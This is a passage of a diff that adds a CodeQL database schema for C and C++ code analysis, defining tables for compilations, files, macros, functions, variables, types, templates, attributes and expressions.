@@ -0,0 +1,2578 @@ + +/*- Compilations -*/ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * gcc -c f1.c f2.c f3.c + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + /** + * An invocation of the compiler. Note that more than one file may + * be compiled per invocation. For example, this command compiles + * three source files: + * + * gcc -c f1.c f2.c f3.c + */ + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | *path to extractor* + * 1 | `--mimic` + * 2 | `/usr/bin/gcc` + * 3 | `-c` + * 4 | f1.c + * 5 | f2.c + * 6 | f3.c + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The expanded arguments that were passed to the extractor for a + * compiler invocation. This is similar to `compilation_args`, but + * for a `@someFile` argument, it includes the arguments from that + * file, rather than just taking the argument literally. + */ +#keyset[id, num] +compilation_expanded_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * Optionally, record the build mode for each compilation. + */ +compilation_build_mode( + unique int id : @compilation ref, + int mode : int ref +); + +/* +case @compilation_build_mode.mode of + 0 = @build_mode_none +| 1 = @build_mode_manual +| 2 = @build_mode_auto +; +*/ + +/** + * The source files that are compiled by a compiler invocation. 
+ * If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.c + * 1 | f2.c + * 2 | f3.c + * + * Note that even if those files `#include` headers, those headers + * do not appear as rows. + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. 
+ */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- Diagnostic messages -*/ + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +/*- C++ dbscheme -*/ + +extractor_version( + string codeql_version: string ref, + string frontend_version: string ref +) + +/** + * Gives the TRAP 
filename that `trap` is associated with. + * For debugging only. + */ +trap_filename( + int trap: @trap, + string filename: string ref +); + +/** + * Gives the tag name for `tag`. + * For debugging only. + */ +tag_name( + int tag: @tag, + string name: string ref +); + +@trap_or_tag = @tag | @trap; + +/** + * Gives the name for the source file. + */ +source_file_name( + int sf: @source_file, + string name: string ref +); + +/** + * In `build-mode: none` overlay mode, indicates that `source_file` + * (`/path/to/foo.c`) uses the TRAP file `trap_file`; i.e. it is the + * TRAP file corresponding to `foo.c`, something it transitively + * includes, or a template instantiation it transitively uses. + */ +source_file_uses_trap( + int source_file: @source_file ref, + int trap_file: @trap ref +); + +/** + * In `build-mode: none` overlay mode, indicates that the TRAP file + * `trap_file` uses tag `tag`. + */ +trap_uses_tag( + int trap_file: @trap ref, + int tag: @tag ref +); + +/** + * Holds if there is a definition of `element` in TRAP file or tag `t`. + */ +in_trap_or_tag( + int element: @element ref, + int t: @trap_or_tag ref +); + +pch_uses( + int pch: @pch ref, + int compilation: @compilation ref, + int id: @file ref +) + +#keyset[pch, compilation] +pch_creations( + int pch: @pch, + int compilation: @compilation ref, + int from: @file ref +) + +/** An element for which line-count information is available. 
*/ +@sourceline = @file | @function | @variable | @enumconstant | @xmllocatable; + +fileannotations( + int id: @file ref, + int kind: int ref, + string name: string ref, + string value: string ref +); + +inmacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +affectedbymacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +case @macroinvocation.kind of + 1 = @macro_expansion +| 2 = @other_macro_reference +; + +macroinvocations( + unique int id: @macroinvocation, + int macro_id: @ppd_define ref, + int location: @location_default ref, + int kind: int ref +); + +macroparent( + unique int id: @macroinvocation ref, + int parent_id: @macroinvocation ref +); + +// a macroinvocation may be part of another location +// the way to find a constant expression that uses a macro +// is thus to find a constant expression that has a location +// to which a macro invocation is bound +macrolocationbind( + int id: @macroinvocation ref, + int location: @location_default ref +); + +#keyset[invocation, argument_index] +macro_argument_unexpanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +#keyset[invocation, argument_index] +macro_argument_expanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +case @function.kind of + 0 = @unknown_function +| 1 = @normal_function +| 2 = @constructor +| 3 = @destructor +| 4 = @conversion_function +| 5 = @operator +// ... 6 = @builtin_function deprecated // GCC built-in functions, e.g. 
__builtin___memcpy_chk +| 7 = @user_defined_literal +| 8 = @deduction_guide +; + +functions( + unique int id: @function, + string name: string ref, + int kind: int ref +); + +builtin_functions( + int id: @function ref +) + +function_entry_point( + int id: @function ref, + unique int entry_point: @stmt ref +); + +function_return_type( + int id: @function ref, + int return_type: @type ref +); + +/** + * If `function` is a coroutine, then this gives the `std::experimental::resumable_traits` + * instance associated with it, and the variables representing the `handle` and `promise` + * for it. + */ +coroutine( + unique int function: @function ref, + int traits: @type ref +); + +/* +case @coroutine_placeholder_variable.kind of + 1 = @handle +| 2 = @promise +| 3 = @init_await_resume +; +*/ + +coroutine_placeholder_variable( + unique int placeholder_variable: @variable ref, + int kind: int ref, + int function: @function ref +) + +/** The `new` function used for allocating the coroutine state, if any. */ +coroutine_new( + unique int function: @function ref, + int new: @function ref +); + +/** The `delete` function used for deallocating the coroutine state, if any. 
*/
+coroutine_delete(
+ unique int function: @function ref,
+ int delete: @function ref
+);
+
+purefunctions(unique int id: @function ref);
+
+function_deleted(unique int id: @function ref);
+
+function_defaulted(unique int id: @function ref);
+
+function_prototyped(unique int id: @function ref)
+
+deduction_guide_for_class(
+ int id: @function ref,
+ int class_template: @usertype ref
+)
+
+member_function_this_type(
+ unique int id: @function ref,
+ int this_type: @type ref
+);
+
+#keyset[id, type_id]
+fun_decls(
+ int id: @fun_decl,
+ int function: @function ref,
+ int type_id: @type ref,
+ string name: string ref,
+ int location: @location_default ref
+);
+fun_def(unique int id: @fun_decl ref);
+fun_specialized(unique int id: @fun_decl ref);
+fun_implicit(unique int id: @fun_decl ref);
+fun_decl_specifiers(
+ int id: @fun_decl ref,
+ string name: string ref
+)
+#keyset[fun_decl, index]
+fun_decl_throws(
+ int fun_decl: @fun_decl ref,
+ int index: int ref,
+ int type_id: @type ref
+);
+/* an empty throw specification is different from none */
+fun_decl_empty_throws(unique int fun_decl: @fun_decl ref);
+fun_decl_noexcept(
+ int fun_decl: @fun_decl ref,
+ int constant: @expr ref
+);
+fun_decl_empty_noexcept(int fun_decl: @fun_decl ref);
+fun_decl_typedef_type(
+ unique int fun_decl: @fun_decl ref,
+ int typedeftype_id: @usertype ref
+);
+
+/*
+case @fun_requires.kind of
+ 1 = @template_attached
+| 2 = @function_attached
+;
+*/
+
+fun_requires(
+ int id: @fun_decl ref,
+ int kind: int ref,
+ int constraint: @expr ref
+);
+
+param_decl_bind(
+ unique int id: @var_decl ref,
+ int index: int ref,
+ int fun_decl: @fun_decl ref
+);
+
+#keyset[id, type_id]
+var_decls(
+ int id: @var_decl,
+ int variable: @variable ref,
+ int type_id: @type ref,
+ string name: string ref,
+ int location: @location_default ref
+);
+var_def(unique int id: @var_decl ref);
+var_specialized(int id: @var_decl ref);
+var_decl_specifiers(
+ int id: @var_decl ref,
+ string name: string ref
+)
+is_structured_binding(unique int id: @variable ref);
+var_requires(
+ int id: @var_decl ref,
+ int constraint: @expr ref
+);
+
+type_decls(
+ unique int id: @type_decl,
+ int type_id: @type ref,
+ int location: @location_default ref
+);
+type_def(unique int id: @type_decl ref);
+type_decl_top(
+ unique int type_decl: @type_decl ref
+);
+type_requires(
+ int id: @type_decl ref,
+ int constraint: @expr ref
+);
+
+namespace_decls(
+ unique int id: @namespace_decl,
+ int namespace_id: @namespace ref,
+ int location: @location_default ref,
+ int bodylocation: @location_default ref
+);
+
+case @using.kind of
+ 1 = @using_declaration
+| 2 = @using_directive
+| 3 = @using_enum_declaration
+;
+
+usings(
+ unique int id: @using,
+ int element_id: @element ref,
+ int location: @location_default ref,
+ int kind: int ref
+);
+
+/** The element which contains the `using` declaration. */
+using_container(
+ int parent: @element ref,
+ int child: @using ref
+);
+
+static_asserts(
+ unique int id: @static_assert,
+ int condition : @expr ref,
+ string message : string ref,
+ int location: @location_default ref,
+ int enclosing : @element ref
+);
+
+// each function has an ordered list of parameters
+#keyset[id, type_id]
+#keyset[function, index, type_id]
+params(
+ int id: @parameter,
+ int function: @parameterized_element ref,
+ int index: int ref,
+ int type_id: @type ref
+);
+
+overrides(
+ int new: @function ref,
+ int old: @function ref
+);
+
+#keyset[id, type_id]
+membervariables(
+ int id: @membervariable,
+ int type_id: @type ref,
+ string name: string ref
+);
+
+#keyset[id, type_id]
+globalvariables(
+ int id: @globalvariable,
+ int type_id: @type ref,
+ string name: string ref
+);
+
+#keyset[id, type_id]
+localvariables(
+ int id: @localvariable,
+ int type_id: @type ref,
+ string name: string ref
+);
+
+autoderivation(
+ unique int var: @variable ref,
+ int derivation_type: @type ref
+);
+
+orphaned_variables(
+ int var: @localvariable ref,
+ int function: @function ref
+)
+
+enumconstants(
+ unique int id: @enumconstant,
+ int parent: @usertype ref,
+ int index: int ref,
+ int type_id: @type ref,
+ string name: string ref,
+ int location: @location_default ref
+);
+
+@variable = @localscopevariable | @globalvariable | @membervariable;
+
+@localscopevariable = @localvariable | @parameter;
+
+/**
+ * Built-in types are the fundamental types, e.g., integral, floating, and void.
+ */
+case @builtintype.kind of
+ 1 = @errortype
+| 2 = @unknowntype
+| 3 = @void
+| 4 = @boolean
+| 5 = @char
+| 6 = @unsigned_char
+| 7 = @signed_char
+| 8 = @short
+| 9 = @unsigned_short
+| 10 = @signed_short
+| 11 = @int
+| 12 = @unsigned_int
+| 13 = @signed_int
+| 14 = @long
+| 15 = @unsigned_long
+| 16 = @signed_long
+| 17 = @long_long
+| 18 = @unsigned_long_long
+| 19 = @signed_long_long
+// ... 20 Microsoft-specific __int8
+// ... 21 Microsoft-specific __int16
+// ... 22 Microsoft-specific __int32
+// ... 23 Microsoft-specific __int64
+| 24 = @float
+| 25 = @double
+| 26 = @long_double
+| 27 = @complex_float // C99-specific _Complex float
+| 28 = @complex_double // C99-specific _Complex double
+| 29 = @complex_long_double // C99-specific _Complex long double
+| 30 = @imaginary_float // C99-specific _Imaginary float
+| 31 = @imaginary_double // C99-specific _Imaginary double
+| 32 = @imaginary_long_double // C99-specific _Imaginary long double
+| 33 = @wchar_t // Microsoft-specific
+| 34 = @decltype_nullptr // C++11
+| 35 = @int128 // __int128
+| 36 = @unsigned_int128 // unsigned __int128
+| 37 = @signed_int128 // signed __int128
+| 38 = @float128 // __float128
+| 39 = @complex_float128 // _Complex __float128
+// ... 40 _Decimal32
+// ... 41 _Decimal64
+// ... 42 _Decimal128
+| 43 = @char16_t
+| 44 = @char32_t
+| 45 = @std_float32 // _Float32
+| 46 = @float32x // _Float32x
+| 47 = @std_float64 // _Float64
+| 48 = @float64x // _Float64x
+| 49 = @std_float128 // _Float128
+// ...
50 _Float128x
+| 51 = @char8_t
+| 52 = @float16 // _Float16
+| 53 = @complex_float16 // _Complex _Float16
+| 54 = @fp16 // __fp16
+| 55 = @std_bfloat16 // __bf16
+| 56 = @std_float16 // std::float16_t
+| 57 = @complex_std_float32 // _Complex _Float32
+| 58 = @complex_float32x // _Complex _Float32x
+| 59 = @complex_std_float64 // _Complex _Float64
+| 60 = @complex_float64x // _Complex _Float64x
+| 61 = @complex_std_float128 // _Complex _Float128
+| 62 = @mfp8 // __mfp8
+| 63 = @scalable_vector_count // __SVCount_t
+| 64 = @complex_fp16 // _Complex __fp16
+| 65 = @complex_std_bfloat16 // _Complex __bf16
+| 66 = @complex_std_float16 // _Complex std::float16_t
+;
+
+builtintypes(
+ unique int id: @builtintype,
+ string name: string ref,
+ int kind: int ref,
+ int size: int ref,
+ int sign: int ref,
+ int alignment: int ref
+);
+
+/**
+ * Derived types are types that are directly derived from existing types and
+ * point to, refer to, transform type data to return a new type.
+ */
+case @derivedtype.kind of
+ 1 = @pointer
+| 2 = @reference
+| 3 = @type_with_specifiers
+| 4 = @array
+| 5 = @gnu_vector
+| 6 = @routineptr
+| 7 = @routinereference
+| 8 = @rvalue_reference // C++11
+// ... 9 type_conforming_to_protocols deprecated
+| 10 = @block
+| 11 = @scalable_vector // Arm SVE
+;
+
+derivedtypes(
+ unique int id: @derivedtype,
+ string name: string ref,
+ int kind: int ref,
+ int type_id: @type ref
+);
+
+pointerishsize(unique int id: @derivedtype ref,
+ int size: int ref,
+ int alignment: int ref);
+
+arraysizes(
+ unique int id: @derivedtype ref,
+ int num_elements: int ref,
+ int bytesize: int ref,
+ int alignment: int ref
+);
+
+tupleelements(
+ unique int id: @derivedtype ref,
+ int num_elements: int ref
+);
+
+typedefbase(
+ unique int id: @usertype ref,
+ int type_id: @type ref
+);
+
+/**
+ * An instance of the C++11 `decltype` operator or C23 `typeof`/`typeof_unqual`
+ * operator taking an expression as its argument.
For example:
+ * ```
+ * int a;
+ * decltype(1+a) b;
+ * typeof(1+a) c;
+ * ```
+ * Here `expr` is `1+a`.
+ *
+ * Sometimes an additional pair of parentheses around the expression
+ * changes the semantics of the decltype, e.g.
+ * ```
+ * struct A { double x; };
+ * const A* a = new A();
+ * decltype( a->x ); // type is double
+ * decltype((a->x)); // type is const double&
+ * ```
+ * (Please consult the C++11 standard for more details).
+ * `parentheses_would_change_meaning` is `true` iff that is the case.
+ */
+
+/*
+case @decltype.kind of
+| 0 = @decltype
+| 1 = @typeof // The frontend does not differentiate between typeof and typeof_unqual
+;
+*/
+
+#keyset[id, expr]
+decltypes(
+ int id: @decltype,
+ int expr: @expr ref,
+ int kind: int ref,
+ int base_type: @type ref,
+ boolean parentheses_would_change_meaning: boolean ref
+);
+
+case @type_operator.kind of
+ 0 = @typeof // The frontend does not differentiate between typeof and typeof_unqual
+| 1 = @underlying_type
+| 2 = @bases
+| 3 = @direct_bases
+| 4 = @add_lvalue_reference
+| 5 = @add_pointer
+| 6 = @add_rvalue_reference
+| 7 = @decay
+| 8 = @make_signed
+| 9 = @make_unsigned
+| 10 = @remove_all_extents
+| 11 = @remove_const
+| 12 = @remove_cv
+| 13 = @remove_cvref
+| 14 = @remove_extent
+| 15 = @remove_pointer
+| 16 = @remove_reference_t
+| 17 = @remove_restrict
+| 18 = @remove_volatile
+| 19 = @remove_reference
+;
+
+type_operators(
+ unique int id: @type_operator,
+ int arg_type: @type ref,
+ int kind: int ref,
+ int base_type: @type ref
+)
+
+case @usertype.kind of
+ 0 = @unknown_usertype
+| 1 = @struct
+| 2 = @class
+| 3 = @union
+| 4 = @enum
+// ... 5 = @typedef deprecated // classic C: typedef typedef type name
+// ... 6 = @template deprecated
+| 7 = @template_parameter
+| 8 = @template_template_parameter
+| 9 = @proxy_class // a proxy class associated with a template parameter
+// ... 10 objc_class deprecated
+// ... 11 objc_protocol deprecated
+// ...
12 objc_category deprecated
+| 13 = @scoped_enum
+// ... 14 = @using_alias deprecated // a using name = type style typedef
+| 15 = @template_struct
+| 16 = @template_class
+| 17 = @template_union
+| 18 = @alias
+;
+
+usertypes(
+ unique int id: @usertype,
+ string name: string ref,
+ int kind: int ref
+);
+
+usertypesize(
+ unique int id: @usertype ref,
+ int size: int ref,
+ int alignment: int ref
+);
+
+usertype_final(unique int id: @usertype ref);
+
+usertype_uuid(
+ unique int id: @usertype ref,
+ string uuid: string ref
+);
+
+/*
+case @usertype.alias_kind of
+| 0 = @typedef
+| 1 = @alias
+*/
+
+usertype_alias_kind(
+ int id: @usertype ref,
+ int alias_kind: int ref
+)
+
+nontype_template_parameters(
+ int id: @expr ref
+);
+
+type_template_type_constraint(
+ int id: @usertype ref,
+ int constraint: @expr ref
+);
+
+mangled_name(
+ unique int id: @declaration ref,
+ int mangled_name : @mangledname,
+ boolean is_complete: boolean ref
+);
+
+is_pod_class(unique int id: @usertype ref);
+is_standard_layout_class(unique int id: @usertype ref);
+
+is_complete(unique int id: @usertype ref);
+
+is_class_template(unique int id: @usertype ref);
+class_instantiation(
+ int to: @usertype ref,
+ int from: @usertype ref
+);
+class_template_argument(
+ int type_id: @usertype ref,
+ int index: int ref,
+ int arg_type: @type ref
+);
+class_template_argument_value(
+ int type_id: @usertype ref,
+ int index: int ref,
+ int arg_value: @expr ref
+);
+class_template_generated_from(
+ unique int template: @usertype ref,
+ int from: @usertype ref
+)
+
+@user_or_decltype = @usertype | @decltype;
+
+is_proxy_class_for(
+ unique int id: @usertype ref,
+ int templ_param_id: @user_or_decltype ref
+);
+
+type_mentions(
+ unique int id: @type_mention,
+ int type_id: @type ref,
+ int location: @location_default ref,
+ // a_symbol_reference_kind from the frontend.
+ int kind: int ref
+);
+
+is_function_template(unique int id: @function ref);
+function_instantiation(
+ unique int to: @function ref,
+ int from: @function ref
+);
+function_template_argument(
+ int function_id: @function ref,
+ int index: int ref,
+ int arg_type: @type ref
+);
+function_template_argument_value(
+ int function_id: @function ref,
+ int index: int ref,
+ int arg_value: @expr ref
+);
+function_template_generated_from(
+ unique int template: @function ref,
+ int from: @function ref
+);
+
+is_variable_template(unique int id: @variable ref);
+variable_instantiation(
+ unique int to: @variable ref,
+ int from: @variable ref
+);
+variable_template_argument(
+ int variable_id: @variable ref,
+ int index: int ref,
+ int arg_type: @type ref
+);
+variable_template_argument_value(
+ int variable_id: @variable ref,
+ int index: int ref,
+ int arg_value: @expr ref
+);
+variable_template_generated_from(
+ unique int template: @variable ref,
+ int from: @variable ref
+);
+
+is_alias_template(unique int id: @usertype ref);
+alias_instantiation(
+ unique int to: @usertype ref,
+ int from: @usertype ref
+);
+alias_template_argument(
+ int type_id: @usertype ref,
+ int index: int ref,
+ int arg_type: @type ref
+);
+alias_template_argument_value(
+ int type_id: @usertype ref,
+ int index: int ref,
+ int arg_value: @expr ref
+);
+alias_template_generated_from(
+ unique int template: @usertype ref,
+ int from: @usertype ref
+);
+
+template_template_instantiation(
+ int to: @usertype ref,
+ int from: @usertype ref
+);
+template_template_argument(
+ int type_id: @usertype ref,
+ int index: int ref,
+ int arg_type: @type ref
+);
+template_template_argument_value(
+ int type_id: @usertype ref,
+ int index: int ref,
+ int arg_value: @expr ref
+);
+
+@concept = @concept_template | @concept_id;
+
+concept_templates(
+ unique int concept_id: @concept_template,
+ string name: string ref,
+ int location: @location_default ref
+);
+concept_instantiation(
+ unique int to:
@concept_id ref,
+ int from: @concept_template ref
+);
+is_type_constraint(int concept_id: @concept_id ref);
+concept_template_argument(
+ int concept_id: @concept ref,
+ int index: int ref,
+ int arg_type: @type ref
+);
+concept_template_argument_value(
+ int concept_id: @concept ref,
+ int index: int ref,
+ int arg_value: @expr ref
+);
+
+routinetypes(
+ unique int id: @routinetype,
+ int return_type: @type ref
+);
+
+routinetypeargs(
+ int routine: @routinetype ref,
+ int index: int ref,
+ int type_id: @type ref
+);
+
+ptrtomembers(
+ unique int id: @ptrtomember,
+ int type_id: @type ref,
+ int class_id: @type ref
+);
+
+/*
+ specifiers for types, functions, and variables
+
+ "public",
+ "protected",
+ "private",
+
+ "const",
+ "volatile",
+ "static",
+
+ "pure",
+ "virtual",
+ "sealed", // Microsoft
+ "__interface", // Microsoft
+ "inline",
+ "explicit",
+
+ "near", // near far extension
+ "far", // near far extension
+ "__ptr32", // Microsoft
+ "__ptr64", // Microsoft
+ "__sptr", // Microsoft
+ "__uptr", // Microsoft
+ "dllimport", // Microsoft
+ "dllexport", // Microsoft
+ "thread", // Microsoft
+ "naked", // Microsoft
+ "microsoft_inline", // Microsoft
+ "forceinline", // Microsoft
+ "selectany", // Microsoft
+ "nothrow", // Microsoft
+ "novtable", // Microsoft
+ "noreturn", // Microsoft
+ "noinline", // Microsoft
+ "noalias", // Microsoft
+ "restrict", // Microsoft
+*/
+
+specifiers(
+ unique int id: @specifier,
+ unique string str: string ref
+);
+
+typespecifiers(
+ int type_id: @type ref,
+ int spec_id: @specifier ref
+);
+
+funspecifiers(
+ int func_id: @function ref,
+ int spec_id: @specifier ref
+);
+
+varspecifiers(
+ int var_id: @accessible ref,
+ int spec_id: @specifier ref
+);
+
+explicit_specifier_exprs(
+ unique int func_id: @function ref,
+ int constant: @expr ref
+)
+
+attributes(
+ unique int id: @attribute,
+ int kind: int ref,
+ string name: string ref,
+ string name_space: string ref,
+ int location: @location_default ref
+);
+
+case
@attribute.kind of
+ 0 = @gnuattribute
+| 1 = @stdattribute
+| 2 = @declspec
+| 3 = @msattribute
+| 4 = @alignas
+// ... 5 @objc_propertyattribute deprecated
+;
+
+attribute_args(
+ unique int id: @attribute_arg,
+ int kind: int ref,
+ int attribute: @attribute ref,
+ int index: int ref,
+ int location: @location_default ref
+);
+
+case @attribute_arg.kind of
+ 0 = @attribute_arg_empty
+| 1 = @attribute_arg_token
+| 2 = @attribute_arg_constant
+| 3 = @attribute_arg_type
+| 4 = @attribute_arg_constant_expr
+| 5 = @attribute_arg_expr
+;
+
+attribute_arg_value(
+ unique int arg: @attribute_arg ref,
+ string value: string ref
+);
+attribute_arg_type(
+ unique int arg: @attribute_arg ref,
+ int type_id: @type ref
+);
+attribute_arg_constant(
+ unique int arg: @attribute_arg ref,
+ int constant: @expr ref
+)
+attribute_arg_expr(
+ unique int arg: @attribute_arg ref,
+ int expr: @expr ref
+)
+attribute_arg_name(
+ unique int arg: @attribute_arg ref,
+ string name: string ref
+);
+
+typeattributes(
+ int type_id: @type ref,
+ int spec_id: @attribute ref
+);
+
+funcattributes(
+ int func_id: @function ref,
+ int spec_id: @attribute ref
+);
+
+varattributes(
+ int var_id: @accessible ref,
+ int spec_id: @attribute ref
+);
+
+namespaceattributes(
+ int namespace_id: @namespace ref,
+ int spec_id: @attribute ref
+);
+
+stmtattributes(
+ int stmt_id: @stmt ref,
+ int spec_id: @attribute ref
+);
+
+@type = @builtintype
+ | @derivedtype
+ | @usertype
+ | @routinetype
+ | @ptrtomember
+ | @decltype
+ | @type_operator;
+
+unspecifiedtype(
+ unique int type_id: @type ref,
+ int unspecified_type_id: @type ref
+);
+
+member(
+ int parent: @type ref,
+ int index: int ref,
+ int child: @member ref
+);
+
+@enclosingfunction_child = @usertype | @variable | @namespace
+
+enclosingfunction(
+ unique int child: @enclosingfunction_child ref,
+ int parent: @function ref
+);
+
+derivations(
+ unique int derivation: @derivation,
+ int sub: @type ref,
+ int index: int ref,
+ int super: @type ref,
+ int location: @location_default ref
+);
+
+derspecifiers(
+ int der_id: @derivation ref,
+ int spec_id: @specifier ref
+);
+
+/**
+ * Contains the byte offset of the base class subobject within the derived
+ * class. Only holds for non-virtual base classes, but see table
+ * `virtual_base_offsets` for offsets of virtual base class subobjects.
+ */
+direct_base_offsets(
+ unique int der_id: @derivation ref,
+ int offset: int ref
+);
+
+/**
+ * Contains the byte offset of the virtual base class subobject for class
+ * `super` within a most-derived object of class `sub`. `super` can be either a
+ * direct or indirect base class.
+ */
+#keyset[sub, super]
+virtual_base_offsets(
+ int sub: @usertype ref,
+ int super: @usertype ref,
+ int offset: int ref
+);
+
+frienddecls(
+ unique int id: @frienddecl,
+ int type_id: @type ref,
+ int decl_id: @declaration ref,
+ int location: @location_default ref
+);
+
+@declaredtype = @usertype ;
+
+@declaration = @function
+ | @declaredtype
+ | @variable
+ | @enumconstant
+ | @frienddecl
+ | @concept_template;
+
+@member = @membervariable
+ | @function
+ | @declaredtype
+ | @enumconstant;
+
+@locatable = @diagnostic
+ | @declaration
+ | @ppd_include
+ | @ppd_define
+ | @macroinvocation
+ /*| @funcall*/
+ | @xmllocatable
+ | @attribute
+ | @attribute_arg;
+
+@namedscope = @namespace | @usertype;
+
+@element = @locatable
+ | @file
+ | @folder
+ | @specifier
+ | @type
+ | @expr
+ | @namespace
+ | @initialiser
+ | @stmt
+ | @derivation
+ | @comment
+ | @preprocdirect
+ | @fun_decl
+ | @var_decl
+ | @type_decl
+ | @namespace_decl
+ | @using
+ | @namequalifier
+ | @specialnamequalifyingelement
+ | @static_assert
+ | @type_mention
+ | @lambdacapture;
+
+@exprparent = @element;
+
+comments(
+ unique int id: @comment,
+ string contents: string ref,
+ int location: @location_default ref
+);
+
+commentbinding(
+ int id: @comment ref,
+ int element: @element ref
+);
+
+exprconv(
+ int converted: @expr ref,
+ unique int conversion: @expr ref
+);
+
+compgenerated(unique int id: @element ref);
+
+/**
+ * `destructor_call` destructs the `i`'th entity that should be
+ * destructed following `element`. Note that entities should be
+ * destructed in reverse construction order, so for a given `element`
+ * these should be called from highest to lowest `i`.
+ */
+#keyset[element, destructor_call]
+#keyset[element, i]
+synthetic_destructor_call(
+ int element: @element ref,
+ int i: int ref,
+ int destructor_call: @routineexpr ref
+);
+
+namespaces(
+ unique int id: @namespace,
+ string name: string ref
+);
+
+namespace_inline(
+ unique int id: @namespace ref
+);
+
+namespacembrs(
+ int parentid: @namespace ref,
+ unique int memberid: @namespacembr ref
+);
+
+@namespacembr = @declaration | @namespace;
+
+exprparents(
+ int expr_id: @expr ref,
+ int child_index: int ref,
+ int parent_id: @exprparent ref
+);
+
+expr_isload(unique int expr_id: @expr ref);
+
+@cast = @c_style_cast
+ | @const_cast
+ | @dynamic_cast
+ | @reinterpret_cast
+ | @static_cast
+ ;
+
+/*
+case @conversion.kind of
+ 0 = @simple_conversion // a numeric conversion, qualification conversion, or a reinterpret_cast
+| 1 = @bool_conversion // conversion to 'bool'
+| 2 = @base_class_conversion // a derived-to-base conversion
+| 3 = @derived_class_conversion // a base-to-derived conversion
+| 4 = @pm_base_class_conversion // a derived-to-base conversion of a pointer to member
+| 5 = @pm_derived_class_conversion // a base-to-derived conversion of a pointer to member
+| 6 = @glvalue_adjust // an adjustment of the type of a glvalue
+| 7 = @prvalue_adjust // an adjustment of the type of a prvalue
+;
+*/
+/**
+ * Describes the semantics represented by a cast expression. This is largely
+ * independent of the source syntax of the cast, so it is separate from the
+ * regular expression kind.
+ */
+conversionkinds(
+ unique int expr_id: @cast ref,
+ int kind: int ref
+);
+
+@conversion = @cast
+ | @array_to_pointer
+ | @parexpr
+ | @reference_to
+ | @ref_indirect
+ | @temp_init
+ | @c11_generic
+ ;
+
+/*
+case @funbindexpr.kind of
+ 0 = @normal_call // a normal call
+| 1 = @virtual_call // a virtual call
+| 2 = @adl_call // a call whose target is only found by ADL
+;
+*/
+iscall(
+ unique int caller: @funbindexpr ref,
+ int kind: int ref
+);
+
+numtemplatearguments(
+ unique int expr_id: @expr ref,
+ int num: int ref
+);
+
+specialnamequalifyingelements(
+ unique int id: @specialnamequalifyingelement,
+ unique string name: string ref
+);
+
+@namequalifiableelement = @expr | @namequalifier;
+@namequalifyingelement = @namespace
+ | @specialnamequalifyingelement
+ | @usertype
+ | @decltype
+ | @derivedtype;
+
+namequalifiers(
+ unique int id: @namequalifier,
+ unique int qualifiableelement: @namequalifiableelement ref,
+ int qualifyingelement: @namequalifyingelement ref,
+ int location: @location_default ref
+);
+
+varbind(
+ int expr: @varbindexpr ref,
+ int var: @accessible ref
+);
+
+funbind(
+ int expr: @funbindexpr ref,
+ int fun: @function ref
+);
+
+@any_new_expr = @new_expr
+ | @new_array_expr;
+
+@new_or_delete_expr = @any_new_expr
+ | @delete_expr
+ | @delete_array_expr;
+
+@prefix_crement_expr = @preincrexpr | @predecrexpr;
+
+@postfix_crement_expr = @postincrexpr | @postdecrexpr;
+
+@increment_expr = @preincrexpr | @postincrexpr;
+
